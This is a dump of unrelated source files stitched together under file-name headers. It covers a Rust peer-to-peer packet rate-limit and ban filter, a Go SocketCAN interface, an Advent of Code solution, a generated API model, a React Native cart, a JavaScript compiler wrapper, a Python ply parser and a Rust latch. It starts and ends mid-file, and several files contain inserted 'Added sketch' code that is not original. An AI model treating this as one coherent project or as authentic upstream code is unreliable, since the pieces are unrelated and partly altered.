max_nodes_per_ip: config.max_nodes_per_ip,
max_bans_per_ip: config.max_bans_per_ip,
}
}
/// The first check. This determines if a new UDP packet should be decoded or dropped.
/// Only unsolicited packets arrive here.
pub fn initial_pass(&mut self, src: &SocketAddr) -> bool {
if PERMIT_BAN_LIST.read().permit_ips.get(&src.ip()).is_some() {
return true;
}
if PERMIT_BAN_LIST.read().ban_ips.get(&src.ip()).is_some() {
debug!("Dropped unsolicited packet from banned src: {:?}", src);
return false;
}
        // Add the un-solicited request to the cache.
        // If this is over the maximum requests per ENFORCED_SIZE_TIME, it will not be added; we
        // leave the rate limiter to enforce the rate limits.
let _ = self.raw_packets_received.cache_insert(*src);
// build the metrics
METRICS
.unsolicited_requests_per_window
.store(self.raw_packets_received.len(), Ordering::Relaxed);
// If the filter isn't enabled, pass the packet
if !self.enabled {
return true;
}
// Check rate limits
if let Some(rate_limiter) = self.rate_limiter.as_mut() {
if rate_limiter.allows(&LimitKind::Ip(src.ip())).is_err() {
warn!("Banning IP for excessive requests: {:?}", src.ip());
// Ban the IP address
let ban_timeout = self.ban_duration.map(|v| Instant::now() + v);
PERMIT_BAN_LIST
.write()
.ban_ips
.insert(src.ip(), ban_timeout);
return false;
}
if rate_limiter.allows(&LimitKind::Total).is_err() {
debug!("Dropped unsolicited packet from RPC limit: {:?}", src.ip());
return false;
}
}
true
}
pub fn final_pass(&mut self, node_address: &NodeAddress, _packet: &Packet) -> bool {
if PERMIT_BAN_LIST
.read()
.permit_nodes
.get(&node_address.node_id)
.is_some()
{
return true;
}
if PERMIT_BAN_LIST
.read()
.ban_nodes
.get(&node_address.node_id)
.is_some()
{
debug!(
"Dropped unsolicited packet from banned node_id: {}",
node_address
);
return false;
}
// If the filter isn't enabled, just pass the packet.
if !self.enabled {
return true;
}
if let Some(rate_limiter) = self.rate_limiter.as_mut() {
if rate_limiter
.allows(&LimitKind::NodeId(node_address.node_id))
.is_err()
{
warn!(
"Node has exceeded its request limit and is now banned {}",
node_address.node_id
);
// The node is being banned
let ban_timeout = self.ban_duration.map(|v| Instant::now() + v);
PERMIT_BAN_LIST
.write()
.ban_nodes
.insert(node_address.node_id, ban_timeout);
// If we are tracking banned nodes per IP, add to the count. If the count is higher
// than our tolerance, ban the IP.
if let Some(max_bans_per_ip) = self.max_bans_per_ip {
let ip = node_address.socket_addr.ip();
if let Some(banned_count) = self.banned_nodes.get_mut(&ip) {
*banned_count += 1;
if *banned_count >= max_bans_per_ip {
PERMIT_BAN_LIST.write().ban_ips.insert(ip, ban_timeout);
}
} else {
self.banned_nodes.put(ip, 0);
}
}
return false;
}
}
// Check the nodes per IP filter configuration
if let Some(max_nodes_per_ip) = self.max_nodes_per_ip {
// This option is set, store the known nodes per IP.
let ip = node_address.socket_addr.ip();
let known_nodes = {
if let Some(known_nodes) = self.known_addrs.get_mut(&ip) {
known_nodes.insert(node_address.node_id);
known_nodes.len()
} else {
let mut ids = HashSet::new();
ids.insert(node_address.node_id);
self.known_addrs.put(ip, ids);
1
}
};
if known_nodes >= max_nodes_per_ip {
warn!("IP has exceeded its node-id limit and is now banned {}", ip);
// The node is being banned
let ban_timeout = self.ban_duration.map(|v| Instant::now() + v);
PERMIT_BAN_LIST.write().ban_ips.insert(ip, ban_timeout);
self.known_addrs.pop(&ip);
return false;
}
}
true
}
    pub fn prune_limiter(&mut self) {
if let Some(rate_limiter) = self.rate_limiter.as_mut() {
rate_limiter.prune();
}
}
}
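// Added sketch (not part of the original module): how the two passes are meant
// to be chained by a packet handler. `initial_pass` gates the raw datagram
// before any decoding work is spent on it; `final_pass` runs once the sender's
// NodeId has been established from the decoded packet.
#[allow(dead_code)]
pub(crate) fn allow_packet(
    filter: &mut Filter,
    src: &SocketAddr,
    node_address: &NodeAddress,
    packet: &Packet,
) -> bool {
    filter.initial_pass(src) && filter.final_pass(node_address, packet)
}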
interface_raw.go | package socketcan
import (
"encoding/binary"
"fmt"
"golang.org/x/sys/unix"
)
func NewRawInterface(ifName string) (Interface, error) {
canIf := Interface{}
canIf.ifType = IF_TYPE_RAW
fd, err := unix.Socket(unix.AF_CAN, unix.SOCK_RAW, CAN_RAW)
if err != nil {
return canIf, err
}
ifIndex, err := getIfIndex(fd, ifName)
if err != nil {
return canIf, err
}
addr := &unix.SockaddrCAN{Ifindex: ifIndex}
if err = unix.Bind(fd, addr); err != nil {
return canIf, err
}
canIf.IfName = ifName
canIf.SocketFd = fd
return canIf, nil
}
func (i Interface) SendFrame(f CanFrame) error {
if i.ifType != IF_TYPE_RAW {
return fmt.Errorf("interface is not raw type")
}
// assemble a SocketCAN frame
frameBytes := make([]byte, 16)
// bytes 0-3: arbitration ID
if f.ArbId < 0x800 {
// standard ID
binary.LittleEndian.PutUint32(frameBytes[0:4], f.ArbId)
} else {
// extended ID
		// set bit 31 (frame format flag: 0 = standard 11 bit, 1 = extended 29 bit)
binary.LittleEndian.PutUint32(frameBytes[0:4], f.ArbId|1<<31)
}
// byte 4: data length code
frameBytes[4] = f.Dlc
// data
copy(frameBytes[8:], f.Data)
_, err := unix.Write(i.SocketFd, frameBytes)
return err
}
func (i Interface) RecvFrame() (CanFrame, error) {
f := CanFrame{}
if i.ifType != IF_TYPE_RAW {
return f, fmt.Errorf("interface is not raw type")
}
// read SocketCAN frame from device
frameBytes := make([]byte, 16)
_, err := unix.Read(i.SocketFd, frameBytes)
if err != nil {
return f, err
}
// bytes 0-3: arbitration ID
	f.ArbId = binary.LittleEndian.Uint32(frameBytes[0:4])
// byte 4: data length code
f.Dlc = frameBytes[4]
// data
f.Data = make([]byte, 8)
copy(f.Data, frameBytes[8:])
return f, nil
}
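// Added sketch (not part of the original file): open a raw interface, send one
// standard frame, and read one frame back. The device name "can0" is an
// assumption; a real system may expose a different CAN interface.
func ExampleRawSendRecv() {
	iface, err := NewRawInterface("can0")
	if err != nil {
		return // no CAN device available on this machine
	}
	frame := CanFrame{ArbId: 0x123, Dlc: 2, Data: []byte{0xDE, 0xAD}}
	if err := iface.SendFrame(frame); err != nil {
		return
	}
	if rx, err := iface.RecvFrame(); err == nil {
		fmt.Printf("received id=0x%X dlc=%d\n", rx.ArbId, rx.Dlc)
	}
}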
day22.rs | use advent_of_code_2021::util::lines;
use std::collections::HashSet;
#[derive(Debug, Eq, PartialEq, Copy, Clone, Hash)]
struct Dot {
x: isize,
y: isize,
z: isize,
}
#[derive(Debug, Eq, PartialEq, Copy, Clone, Hash)]
struct Cube {
x0: isize,
x1: isize,
y0: isize,
y1: isize,
z0: isize,
z1: isize,
}
impl Cube {
fn dots(&self) -> Vec<Dot> {
let mut dots = Vec::new();
for x in self.x0..=self.x1 {
for y in self.y0..=self.y1 {
for z in self.z0..=self.z1 {
let dot = Dot { x, y, z };
dots.push(dot);
}
}
}
dots
}
fn size(&self) -> usize {
(self.x1 - self.x0 + 1).abs() as usize
* (self.y1 - self.y0 + 1).abs() as usize
* (self.z1 - self.z0 + 1).abs() as usize
}
fn and(&self, that: &Cube) -> Option<Cube> {
let (x0, x1) = overlap(self.x0, self.x1, that.x0, that.x1)?;
let (y0, y1) = overlap(self.y0, self.y1, that.y0, that.y1)?;
let (z0, z1) = overlap(self.z0, self.z1, that.z0, that.z1)?;
Some(Cube {
x0,
x1,
y0,
y1,
z0,
z1,
})
}
}
fn overlap(a: isize, b: isize, c: isize, d: isize) -> Option<(isize, isize)> {
let a0 = a.min(b);
let a1 = a.max(b);
let b0 = c.min(d);
let b1 = c.max(d);
if a0 < b0 && a1 < b0 {
return None;
}
if a0 > b1 && a1 > b1 {
return None;
}
Some((a0.max(b0), a1.min(b1)))
}
fn parse(s: &str) -> (bool, Cube) {
let mut it = s.split_whitespace();
let flag_part = it.next().unwrap();
let mut cube_part = it.next().unwrap().split(',');
let mut x_range = cube_part
.next()
.unwrap()
.split('=')
.nth(1)
.unwrap()
.split("..");
let mut y_range = cube_part
.next()
.unwrap()
.split('=')
.nth(1)
.unwrap()
.split("..");
let mut z_range = cube_part
.next()
.unwrap()
.split('=')
.nth(1)
.unwrap()
.split("..");
let cube = Cube {
x0: x_range.next().unwrap().parse().unwrap(),
x1: x_range.next().unwrap().parse().unwrap(),
y0: y_range.next().unwrap().parse().unwrap(),
y1: y_range.next().unwrap().parse().unwrap(),
z0: z_range.next().unwrap().parse().unwrap(),
z1: z_range.next().unwrap().parse().unwrap(),
};
match flag_part {
"on" => (true, cube),
"off" => (false, cube),
_ => unreachable!(),
}
}
fn part1(ops: &[(bool, Cube)], init: &Cube) -> usize {
ops.iter()
.flat_map(|(flag, cube)| {
cube.and(init)
.map(|c| c.dots())
.unwrap_or_default()
.into_iter()
.map(|d| (flag, d))
.collect::<Vec<_>>()
        })
        .fold(HashSet::new(), |mut set, (on, dot)| {
            if *on {
                set.insert(dot);
            } else {
                set.remove(&dot);
}
set
})
.len()
}
fn cut_one(a: isize, b: isize, c: isize, d: isize) -> Vec<(isize, isize)> {
assert!(a <= c);
assert!(b >= d);
// match
// a b
// |-----------|
// c d
// |-----------|
// a b
// |-----------|
if a == c && b == d {
return vec![(a, b)];
}
// lo end
// a b
// |------------|
// c d
// |--------|
// c d b
// |--------||--|
if a == c && d < b {
return vec![(a, d), (d + 1, b)];
}
// hi end
// a b
// |------------|
// c d
// ----|--------|
// a c d
// |--||--------|
if c > a && d == b {
return vec![(a, c - 1), (c, d)];
}
// middle
// a b
// |-------------|
// c d
// ---|------|----
// a c d b
// |-||------||--|
vec![(a, c - 1), (c, d), (d + 1, b)]
}
fn cut(this: &Cube, that: &Cube) -> Vec<Cube> {
if let Some(that) = this.and(that) {
let mut cubes = Vec::new();
for (x0, x1) in cut_one(this.x0, this.x1, that.x0, that.x1) {
for (y0, y1) in cut_one(this.y0, this.y1, that.y0, that.y1) {
for (z0, z1) in cut_one(this.z0, this.z1, that.z0, that.z1) {
let cube = Cube {
x0,
x1,
y0,
y1,
z0,
z1,
};
if cube == that {
continue;
}
cubes.push(cube);
}
}
}
cubes
} else {
vec![*this]
}
}
fn part2(ops: &[(bool, Cube)]) -> usize {
let mut done: Vec<Cube> = Vec::new();
for (flag, cube) in ops {
done = done.into_iter().flat_map(|x| cut(&x, cube)).collect();
if *flag {
done.push(*cube);
}
}
done.into_iter().map(|cube| cube.size()).sum()
}
fn main() {
let ops = lines().into_iter().map(|s| parse(&s)).collect::<Vec<_>>();
let init = Cube {
x0: -50,
x1: 50,
y0: -50,
y1: 50,
z0: -50,
z1: 50,
};
let part1 = part1(&ops, &init);
println!("{}", part1);
let part1_ops = ops
.iter()
.cloned()
.flat_map(|(flag, cube)| cube.and(&init).map(|cube| (flag, cube)))
.collect::<Vec<_>>();
assert_eq!(part2(&part1_ops), part1);
println!("{}", part2(&ops));
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_parse() {
assert_eq!(
parse("on x=-20..26,y=-36..17,z=-47..7"),
(
true,
(Cube {
x0: -20,
x1: 26,
y0: -36,
y1: 17,
z0: -47,
z1: 7
})
)
);
}
#[test]
fn test_size() {
assert_eq!(
Cube {
x0: 0,
x1: 0,
y0: 0,
y1: 0,
z0: 0,
z1: 0,
}
.size(),
1
);
assert_eq!(
Cube {
x0: 0,
x1: 6,
y0: 0,
y1: 4,
z0: 0,
z1: 0,
}
.size(),
35
);
}
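    // Added sketch: sanity checks for `overlap` and `cut_one`, the interval
    // helpers `cut` is built from, matching the ASCII diagrams above.
    #[test]
    fn test_overlap_and_cut_one() {
        assert_eq!(overlap(0, 10, 3, 5), Some((3, 5)));
        assert_eq!(overlap(0, 2, 5, 9), None);
        assert_eq!(cut_one(0, 10, 3, 5), vec![(0, 2), (3, 5), (6, 10)]);
        assert_eq!(cut_one(0, 10, 0, 4), vec![(0, 4), (5, 10)]);
        assert_eq!(cut_one(0, 10, 6, 10), vec![(0, 5), (6, 10)]);
    }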
}
patched_tag_update.rs | /*
* CloudTruth Management API
*
* CloudTruth centralizes your configuration parameters and secrets making them easier to manage and use as a team.
*
* The version of the OpenAPI document: 1.0.0
* Contact: [email protected]
* Generated by: https://openapi-generator.tech
*/
/// PatchedTagUpdate : Details for updating a tag.
#[derive(Clone, Debug, PartialEq, Default, Serialize, Deserialize)]
pub struct PatchedTagUpdate {
/// A unique identifier for the tag.
#[serde(rename = "id", skip_serializing_if = "Option::is_none")]
pub id: Option<String>,
/// The tag name. Tag names may contain alphanumeric, hyphen, underscore, or period characters. Tag names are case sensitive. The name cannot be modified.
#[serde(rename = "name", skip_serializing_if = "Option::is_none")]
pub name: Option<String>,
/// A description of the tag. You may find it helpful to document how this tag is used to assist others when they need to maintain software that uses this content.
#[serde(rename = "description", skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
/// The point in time this tag represents. If explicitly set to `null` then the current time will be used.
#[serde(rename = "timestamp", skip_serializing_if = "Option::is_none")]
pub timestamp: Option<String>,
}
impl PatchedTagUpdate {
/// Details for updating a tag.
pub fn new() -> PatchedTagUpdate {
PatchedTagUpdate {
id: None,
name: None,
description: None,
timestamp: None,
}
}
}
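// Added sketch (not part of the generated file): a convenience constructor for
// a description-only patch; unset fields are omitted from the serialized JSON
// thanks to the `skip_serializing_if` attributes above.
impl PatchedTagUpdate {
    pub fn with_description(description: &str) -> PatchedTagUpdate {
        PatchedTagUpdate {
            description: Some(description.to_string()),
            ..PatchedTagUpdate::default()
        }
    }
}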
index.tsx | import React, { useCallback, useMemo } from 'react';
import FeatherIcon from 'react-native-vector-icons/Feather';
import { View } from 'react-native';
import {
Container,
ProductContainer,
ProductList,
Product,
ProductImage,
ProductTitleContainer,
ProductTitle,
ProductPriceContainer,
ProductSinglePrice,
TotalContainer,
ProductPrice,
ProductQuantity,
ActionContainer,
ActionButton,
TotalProductsContainer,
TotalProductsText,
SubtotalValue,
} from './styles';
import { useCart } from '../../hooks/cart';
import formatValue from '../../utils/formatValue';
interface Product {
id: string;
title: string;
image_url: string;
price: number;
quantity: number;
}
const Cart: React.FC = () => {
const { increment, decrement, products } = useCart();
const handleIncrement = useCallback(
(id: string): void => {
increment(id);
},
[increment],
);
const handleDecrement = useCallback(
(id: string): void => {
decrement(id);
},
[decrement],
);
const cartTotal = useMemo(() => {
const prices = products.map(product => {
return product.price * product.quantity;
});
const total = prices.reduce(
(accumulator, currentValue) => accumulator + currentValue,
0,
);
return formatValue(total);
}, [products]);
const totalItensInCart = useMemo(() => {
const totalPerProduct = products.map(product => product.quantity);
const total = totalPerProduct.reduce(
(accumulator, currentValue) => accumulator + currentValue,
0,
);
return total;
}, [products]);
return (
<Container>
<ProductContainer>
<ProductList
data={products}
keyExtractor={item => item.id}
ListFooterComponent={<View />}
ListFooterComponentStyle={{
height: 80,
}}
renderItem={({ item }: { item: Product }) => (
<Product>
<ProductImage source={{ uri: item.image_url }} />
<ProductTitleContainer>
<ProductTitle>{item.title}</ProductTitle>
<ProductPriceContainer>
<ProductSinglePrice>
{formatValue(item.price)}
</ProductSinglePrice>
<TotalContainer>
<ProductQuantity>{`${item.quantity}x`}</ProductQuantity>
                    <ProductPrice>
                      {formatValue(item.price * item.quantity)}
</ProductPrice>
</TotalContainer>
</ProductPriceContainer>
</ProductTitleContainer>
<ActionContainer>
<ActionButton
testID={`increment-${item.id}`}
onPress={() => handleIncrement(item.id)}
>
<FeatherIcon name="plus" color="#E83F5B" size={16} />
</ActionButton>
<ActionButton
testID={`decrement-${item.id}`}
onPress={() => handleDecrement(item.id)}
>
<FeatherIcon name="minus" color="#E83F5B" size={16} />
</ActionButton>
</ActionContainer>
</Product>
)}
/>
</ProductContainer>
<TotalProductsContainer>
<FeatherIcon name="shopping-cart" color="#fff" size={24} />
<TotalProductsText>{`${totalItensInCart} itens`}</TotalProductsText>
<SubtotalValue>{cartTotal}</SubtotalValue>
</TotalProductsContainer>
</Container>
);
};
export default Cart;
compiler.js | var fs = require('fs');
var path = require('path');
var _ = require('underscore');
var fsext = require('../fsext');
var CompileProcess = require('./compile-process');
module.exports = Compiler;
/**
* `Compiler` is the class for compiling awfco (AWF Compiled Object).
*
* An instance of this class is responsible to compile (transpile) some type of
* source to valid es5 script code along with bundled css, module dependency and
* source map.
*
* This class should not be subclassed. Pass in a `compileFunc` when instantiating
* instead.
*
 * `compileFunc` is a function implementing a specific compile process. It will be
 * called as an object method; the object will contain the following properties and
 * methods, which may be accessed through `this`:
*
* opt: compiler input options with the following keys:
* moduleName : default import/export name for the module
* importPath : path of the module used for importing
* relativePath : path of the source file relative to project root
* absolutePath : system normalized absolute file path of the source file
* sourceContent : the text content of the source code
* extra : extra options that may be passed to the compiler
*
* success(): called on a successful compile, marks the end of compilation.
* Tip: set result on jsOutput, jsMap, cssOutput, cssMap defined on `this`
*
* reject(): called on failure (e.g. syntax error), marks the end of compilation.
* reject(message:string, line:number, column:number)
* reject(message:string, pos:Object<{path, content, line, column}>)
* reject(errors:Array)
*
* depends(): called if this compiled module logically depends on another compiled
* module and that depended module should precede in the linking process.
* depends(moduleName:string)
*
* watch(): called if this compiled object should be recompiled when a source file
* other than the directly pointed one is changed.
* watch(sourceAbsolutePath:string)
*
* Tip: The `compileFunc` function call context object can be extended by extending
* the prototype property of the function.
*
* Hint: all line and column numbers are zero based
**/
function Compiler(compileFunc) {
if (typeof this != 'object' || !(this instanceof Compiler)) {
return new Compiler(compileFunc);
}
this.CompileProcess = CompileProcess.derive(compileFunc);
}
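// Added sketch (not part of the original source): the smallest compileFunc
// honoring the contract documented above -- a pass-through "compiler" that
// emits the source unchanged. The name `identityCompiler` is illustrative only.
var identityCompiler = new Compiler(function() {
  this.jsOutput = this.opt.sourceContent; // echo the source as compiled output
  this.success();
});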
/**
* Compile `fpath` to `target`, with `dir` as project root
* Return a promise
*/
Compiler.prototype.compile = function(fpath, target, dir, extra) {
return new Promise(proc.bind(this));
function proc(accept, reject) {
if (typeof dir == 'object') {
extra = dir;
dir = '.';
} else if (!dir) {
dir = '.';
}
fs.readFile(fpath, 'utf-8', gotFile.bind(this));
function gotFile(err, content) {
if (err) {
accept();
} else {
var opt = {};
opt.relativePath = fsext.normalizePath(path.relative(dir, fpath));
opt.absolutePath = fsext.normalizePath(path.resolve(fpath));
opt.target = fsext.normalizePath(path.resolve(target));
opt.moduleName = Compiler.moduleName(opt.relativePath);
opt.importPath = '/' + Compiler.importPath(opt.relativePath);
opt.extra = extra || {};
opt.sourceContent = content;
        var compileProcess = new (this.CompileProcess)();
        compileProcess
          .compile(opt)
          .then(accept)
          .catch(function(err) {
            console.warn(err.stack);
});
}
}
};
};
Compiler.moduleName = function(fpath) {
var path = require('path');
var name = path.basename(fpath);
name = name.split('.')[0] || '';
name = name.replace(/[^$a-zA-Z0-9_$]+/g, '_');
if (name.match(/^[0-9]/))
name = '_' + name;
return name;
};
Compiler.importPath = function(fpath, contextPath) {
var ret = fpath;
var isRelative = !!ret.match(/^\.\.?[\/\\]/);
var name = Compiler.moduleName(ret);
ret = path.dirname(ret);
if (name != 'index') {
ret = path.join(ret, name);
}
if (contextPath && isRelative) {
ret = path.join(path.dirname(contextPath), ret);
}
if (isRelative || fpath[0] == '/' || fpath[0] == '\\')
ret = '/' + ret;
return fsext.normalizePath(ret);
};
parse.py | import ply.yacc as yacc
# get the token map from the lexer
from lex import tokens
import sys
import pushdown
Pushdown = pushdown.Pushdown
State = pushdown.State
Rule = pushdown.Rule
ParseState = pushdown.ParseState
Production = pushdown.Production
Shift = pushdown.Shift
Reduce = pushdown.Reduce
# Grammar
#
# file := GRAMMAR NEWLINE rulelist NEWLINE TLIST NEWLINE tlist NEWLINE
# NTLIST NEWLINE ntlist NEWLINE PMETHOD NEWLINE statelist
# rulelist := rule rulelist
# | empty
# tlist := tterm tlist
# | empty
# ntlist := ntterm ntlist
# | empty
# statelist := state statelist
# | empty
# rule := RULE production
# tterm := TERMINAL COLON numbers
# ntterm := NONTERMINAL COLON numbers
# state := STATE NEWLINE srulelist NEWLINE trules NEWLINE ntrules NEWLINE
# production := NONTERMINAL RARROW rhs
# numbers := INT numbers
# | empty
# srulelist := srule
# | empty
# trules := trule trules
# | empty
# ntrules := ntrule ntrules
# | empty
# rhs := exp erhs
# erhs := exp erhs
# | empty
# srule := LPAREN INT RPAREN production
# trule := TERMINAL operation
# ntrule := NONTERMINAL operation
# exp := DOT | TERMINAL | NONTERMINAL
# operation := SHIFT | REDUCE LPAREN production RPAREN
terminals = ["<empty>"]
non_terminals = []
def p_file(p):
'''file : anythinglist GRAMMAR DNEWLINE rulelist TLIST DNEWLINE tlist NTLIST DNEWLINE ntlist PMETHOD DNEWLINE statelist'''
terms = [x for (x, _) in p[7]]
nterms = [x for (x, _) in p[10]]
print "non_terminals:", non_terminals
print "terminals:", terminals
p[0] = Pushdown(p[13], terms, nterms)
for r in p[4]:
p[0].add_rule(r)
for s in p[13]:
p[0].add_state(s)
for k, v in p[7]:
p[0].add_t(k, v)
for k, v in p[10]:
p[0].add_nt(k, v)
# ignore everything before we see the start of the GRAMMAR
def p_anything(p):
''' anything : RULE
| STATE
| TLIST
| NTLIST
| PMETHOD
| SHIFT
| REDUCE
| RARROW
| IDENT
| INT
| COLON
| LPAREN
| RPAREN
| DOT
| NEWLINE
| DNEWLINE'''
pass
# We'll simplify things by having a single rule for all our list productions
def p_list(p):
'''statelist : state statelist
| state NEWLINE statelist
| empty
numbers : INT numbers
| empty
trules : trule NEWLINE trules
| DNEWLINE
ntrules : ntrule NEWLINE ntrules
| empty
erhs : exp erhs
| empty
anythinglist : anything anythinglist
| empty'''
if len(p) == 2:
p[0] = list()
elif len(p) == 4:
p[0] = [p[1]] + p[3]
else:
p[0] = [p[1]] + p[2]
def p_non_empty_list(p):
'''tlist : tterm NEWLINE tlist
| tterm DNEWLINE
ntlist : ntterm NEWLINE ntlist
| ntterm DNEWLINE
srulelist : srule NEWLINE srulelist
| srule DNEWLINE
sactions : action NEWLINE sactions
| action DNEWLINE'''
if len(p) == 3:
p[0] = [p[1]]
else:
p[0] = [p[1]] + p[3]
# def p_rulelist(p):
# '''rulelist : ruleset DNEWLINE rulelist
# | empty'''
# if len(p) == 2:
# p[0] = list()
# else:
# p[0] = p[1] + p[3]
# def p_forced_list(p):
# '''trules : trule etrules
# ntrules : ntrule entrules'''
# p[0] = [p[1]] + p[2]
def p_ruleset(p):
'''rulelist : rule NEWLINE rulelist
| rule DNEWLINE'''
if len(p) == 3:
p[0] = [p[1]]
else:
p[0] = [p[1]] + p[3]
def p_rule(p):
'''rule : RULE production'''
p[0] = Rule(p[1], p[2]._lhs, p[2]._rhs)
def p_tterm(p):
'''tterm : IDENT COLON numbers'''
global terminals
terminals.append(p[1])
p[0] = (p[1], p[3])
def p_ntterm(p):
'''ntterm : IDENT COLON numbers'''
global non_terminals
non_terminals.append(p[1])
p[0] = (p[1], p[3])
def p_state(p):
'''state : STATE DNEWLINE srulelist sactions sactions
| STATE DNEWLINE srulelist sactions
| STATE DNEWLINE srulelist DNEWLINE'''
actions = []
if isinstance(p[4], list):
actions.extend([(x, y) for (x, y) in p[4] if y is not None])
if len(p) >= 6:
actions.extend([(x, y) for (x, y) in p[5] if y is not None])
# make a dict of t- and nt-transitions
t = dict()
    nt = dict()
    for k, v in actions:
if k in non_terminals:
nt[k] = v
else:
t[k] = v
p[0] = State(p[1], p[3], t, nt)
# def p_state_no_t(p):
# '''state : STATE dnewline srulelist dnewline ntrules NEWLINE'''
# # make a dict of t- and nt-transitions
# t = dict()
# nt = dict()
# for k, v in p[6]:
# nt[k] = v
# p[0] = State(p[1], p[2], t, nt)
#
#
# def p_state_no_nt(p):
# '''state : STATE dnewline srulelist NEWLINE trules NEWLINE'''
# # make a dict of t- and nt-transitions
# t = dict()
# nt = dict()
# for k, v in p[5]:
# t[k] = v
# p[0] = State(p[1], p[2], t, nt)
def p_production(p):
'''production : IDENT RARROW rhs'''
p[0] = Production(p[1], p[3])
def p_rhs(p):
'''rhs : exp erhs'''
p[0] = [p[1]] + p[2]
def p_srule(p):
'''srule : LPAREN INT RPAREN production'''
p[0] = ParseState(p[2], p[4]._rhs.index('.'))
def p_action(p):
'''trule : IDENT operation
ntrule : IDENT operation
action : IDENT operation
| BANG IDENT LBRACKET operation RBRACKET'''
if len(p) == 6:
p[0] = (p[2], None)
else:
p[0] = (p[1], p[2])
def p_exp(p):
'''exp : DOT
| IDENT'''
p[0] = p[1]
def p_operation(p):
'''operation : SHIFT
| REDUCE LPAREN production RPAREN'''
if len(p) == 2:
p[0] = Shift(p[1])
else:
p[0] = Reduce(ParseState(p[1], position=p[3]._rhs.index('.')))
# Error rule for syntax errors
def p_error(p):
if not p:
print "End of File!"
return
print "Syntax error at token", p.type, "on line", p.lineno
sys.exit(1)
def p_empty(p):
'''empty : '''
pass
parser = yacc.yacc()
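# Added sketch (not part of the original script): drive the parser from stdin.
# This assumes the lexer built by the `lex` module is the most recently created
# one, which is what ply's yacc.parse() falls back to when no lexer is passed.
if __name__ == '__main__':
    pda = parser.parse(sys.stdin.read())
    print "parsed pushdown:", pda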
latch.rs | // Unless explicitly stated otherwise all files in this repository are licensed
// under the MIT/Apache-2.0 License, at your convenience
//
// This product includes software developed at Datadog (https://www.datadoghq.com/).
// Copyright 2020 Datadog, Inc.
//
//! Similar to a [`std::sync::Barrier`] but provides [`Latch::cancel`] which a
//! failed thread can use to cancel the `Latch`.
//! [`Latch::wait`] and [`Latch::arrive_and_wait`] return a [`LatchState`] to
//! determine whether the state is `Ready` or `Canceled`.
//!
//! The implementation is intended for multi-threaded rather than task local
//! use.
use std::sync::{
atomic::{AtomicUsize, Ordering},
Arc,
Condvar,
Mutex,
};
#[derive(Clone, Debug)]
pub(crate) struct Latch {
inner: Arc<LatchInner>,
}
#[derive(Debug)]
struct LatchInner {
count: AtomicUsize,
state: Mutex<LatchState>,
cv: Condvar,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum LatchState {
Pending,
Ready,
Canceled,
}
impl Latch {
/// Create a new `Latch` with given count.
pub fn new(count: usize) -> Self {
let state = if 0 < count {
LatchState::Pending
} else {
LatchState::Ready
};
let inner = LatchInner {
count: AtomicUsize::new(count),
state: Mutex::new(state),
cv: Condvar::new(),
};
Self {
inner: Arc::new(inner),
}
}
/// If the counter's current value is greater than or equal to `n`, this
/// method decrements the counter by 'n' and returns an `Ok` containing
/// the previous value. Otherwise, this method returns an `Err` with
/// the previous value. This method's behavior is independent of the
/// `LatchState` (e.g. it may return `Ok(0)` even if the state is `Canceled`
/// if `n == 0`).
///
/// The method does not synchronize with other threads, so while setting the
/// counter to 0 with this method (or checking its value with
/// `count_down(0)`) is indicative that the state is either `Ready` or
/// `Canceled`, other data may not yet be synchronized with other threads.
pub fn count_down(&self, n: usize) -> Result<usize, usize> {
self.update(LatchState::Ready, |v| (v >= n).then(|| v - n))
}
/// Cancels the latch. Other threads will no longer wait. If this call
/// caused a Cancellation, it returns `Ok` with the previous counter value.
/// Otherwise, it returns an `Err` with the `LatchState`.
///
/// The method does not synchronize with other threads.
    pub fn cancel(&self) -> Result<usize, LatchState> {
self.update(LatchState::Canceled, |v| (v != 0).then(|| 0))
.map_err(|_| self.wait())
}
/// Wait for `Ready` or `Canceled`. Synchronizes with other threads via an
/// internal `Mutex`.
#[must_use = "check if latch was canceled"]
pub fn wait(&self) -> LatchState {
*self
.inner
.cv
.wait_while(self.lock(), |s| matches!(s, LatchState::Pending))
.expect("unreachable: poisoned mutex")
}
/// Decrement the counter by one and wait for `Ready` or `Canceled`.
/// Synchronizes with other threads via an internal `Mutex`.
#[must_use = "check if latch was canceled"]
pub fn arrive_and_wait(&self) -> LatchState {
self.count_down(1).ok();
self.wait()
}
/// Update the counter based on the provided closure `f` which receives as
/// input the current value of the counter and should return `Some(new)`
/// or `None` if no change should be made. The provided closure is
/// called repeatedly until it either succeeds in updating the `Latch`'s
/// internal atomic counter or returns `None`. If the updated counter value
/// is `0`, then `LatchState` will be changed to `state_if_zero`. The
/// `update` method returns an `Ok` of the previous counter value if the
/// closure returned `Some(new)` or an `Err` of the unchanged value
/// otherwise.
fn update<F>(&self, state_if_zero: LatchState, mut f: F) -> Result<usize, usize>
where
F: FnMut(usize) -> Option<usize>,
{
let mut new = None;
let f_observe = |cur| {
new = f(cur);
new
};
// the Mutex synchronizes, so using `Ordering::Relaxed` here
let res = self
.inner
.count
.fetch_update(Ordering::Relaxed, Ordering::Relaxed, f_observe);
if let Some(0) = new {
self.set_state(state_if_zero);
}
res
}
fn set_state(&self, state: LatchState) {
*self.lock() = state;
self.inner.cv.notify_all();
}
fn lock(&self) -> std::sync::MutexGuard<'_, LatchState> {
self.inner
.state
.lock()
.expect("unreachable: poisoned mutex")
}
}
#[cfg(test)]
mod test {
use super::*;
use std::collections::HashSet;
#[test]
fn cancel() {
let n = 1 << 10;
let cxl_ids = (n / 2..n + 1)
.into_iter()
.step_by(n / 2 / 5)
.collect::<HashSet<_>>();
assert_eq!(6, cxl_ids.len());
let (w, a, t) = helper(cxl_ids, n);
assert_eq!(n - 5 - 1, w.len());
assert_eq!(1, a.len());
assert_eq!(5, t.len());
w.into_iter().for_each(|s| {
assert_eq!(s, LatchState::Canceled);
});
}
#[test]
fn ready() {
let n = 1 << 10;
let cxl_ids = HashSet::new();
assert_eq!(0, cxl_ids.len());
let (w, a, t) = helper(cxl_ids, n);
assert_eq!(n, w.len());
assert_eq!(0, a.len());
assert_eq!(0, t.len());
w.into_iter().for_each(|s| {
assert_eq!(s, LatchState::Ready);
});
}
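    // Added sketch: `count_down` never underflows -- a request larger than the
    // remaining count is rejected with the unchanged value.
    #[test]
    fn count_down_underflow() {
        let l = Latch::new(2);
        assert_eq!(l.count_down(3), Err(2));
        assert_eq!(l.count_down(2), Ok(2));
        assert_eq!(l.wait(), LatchState::Ready);
    }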
fn helper(
cxl_ids: HashSet<usize>,
